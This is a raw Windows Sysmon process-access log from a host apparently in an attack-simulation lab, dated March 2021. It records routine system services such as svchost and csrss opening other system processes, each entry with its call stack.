12:02:27.894{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006257Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.894{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006256Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.894{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006255Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.894{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006254Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.894{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006253Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.894{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006252Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.879{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006251Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.879{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006250Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.879{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006249Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.879{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006248Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.879{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006247Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.879{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006246Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.770{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006245Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.770{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006244Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.770{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006243Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.770{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006242Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.770{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006241Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.770{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006240Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.770{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006239Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.536{266CAFBE-646C-6064-1000-00000000AE01}11242252C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006238Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.536{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006237Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.521{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006236Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.521{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\psmsrv.dll+e342|c:\windows\system32\psmsrv.dll+eb86|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006235Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.334{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000006234Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.334{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+f967|C:\Windows\SYSTEM32\psmserviceexthost.dll+fa6b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1276f|C:\Windows\SYSTEM32\psmserviceexthost.dll+16952|C:\Windows\SYSTEM32\resourcepolicyserver.dll+15142|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11b0c|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b955|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000006233Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
